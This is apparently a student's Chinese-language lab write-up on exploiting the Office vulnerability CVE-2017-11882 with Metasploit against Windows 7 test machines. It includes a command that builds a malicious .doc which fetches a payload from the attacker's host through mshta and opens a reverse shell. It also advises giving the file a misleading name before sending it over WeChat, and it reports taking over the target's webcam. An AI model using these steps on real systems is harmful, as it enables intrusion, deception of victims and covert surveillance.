MSF渗透测试-CVE-2017-11882(MSOffice漏洞)
1.测试环境
攻击机:
OS:kail
IP:192.168.15.132/192.168.137.231
靶机:
OS:Windows7
Office版本:Office2013_CN
IP:
2.测试前准备
2.下载MSF组件
3.将cve_2017_11882.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
4.把下载的cve_2017_11882.rtf复制到/usr/share/metasploit-framework/data/exploits/目录下
5.把Command109b_CVE-2017-11882.py复制到/root目录下
3.测试过程
3.1虚拟机环境测试
1.msfconsole执行search命令
2.设置payload为reverse_tcp,设置LHOST为192.168.15.132,设置URIPATH为test(之后利用python脚本生成doc文件的时候也要使用相同路径)
3.show options显示设置
4.exploit -j运行
5.另开一个terminal,python Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc
6.把生成的kail_help复制到靶机中打开,是个空白文档
7.回连成功
8.sessions -i 1接管活动会话1,shell可以看到已经成功渗透靶机
3.2局域网靶机测试
0.更改kail网络链接模式由NAT->桥接,获得一个与靶机在同一网段下的IP192.168.137.231
1.更改一下LHOST,重新生成一个doc文件,exploit -j监听
2.将文件改名为kail_help2.doc通过微信发给靶机(随便改啥,具有迷惑性就行)
3.靶机打开doc,Windows7防火墙处于打开状态,无杀软
4.攻击机获得回连,sessions -i 1接管
5.webcam_stream可以直接控制摄像头进行直播
6.shell中获取靶机桌面信息
4.测试感想
- 前人栽树,后人乘凉。
github和meterpreter-db上有漏洞相关的msf模块和python脚本可以直接使用 - 老旧系统、软件十分不靠谱,易于攻入。其实还实践了
WindowsDefender+Windows10的组合,WinodowsDefender会直接将doc文件杀掉,但是这个版本的WIN7还是应用很广的,包括Office2013可以说是学生中应用十分广泛的版本(这个Windwos镜像和office2013都是徐日老师FTP服务器上的版本,在DKY安装率应该还是很有保证的)
最新文章
- 前端之js的常用用法
- 你不知道的JavaScript--DOM基础详解2
- google chrome 32 升级变更找回user agent(google chrome lose user agent)
- 安装cocoaPods遇到的坑
- DataTable用法
- Android学习四、Android中的Adapter
- 安装setuptools和pip
- Android学习笔记(不定时更新)
- Visual Studio 2015 中文企业版及专业版 正式版下载地址 激活秘钥 正版key
- Flex4 布局 元素index
- Python打印乘法口诀表
- [SHOI2008]cactus仙人掌图
- linux系统安装mysql数据库
- vue_过渡_动画
- 李清华 201772020113《面向对象程序设计(java)》第十四周学习总结
- Ex 6_21 最小点覆盖问题_第八次作业
- 【IT笔试面试题整理】判断一个树是否是另一个的子树
- ibatis.net:第二天,Hello,World ?
- Java SE练习题——求奇数
- bzoj 2456: mode ——独特水法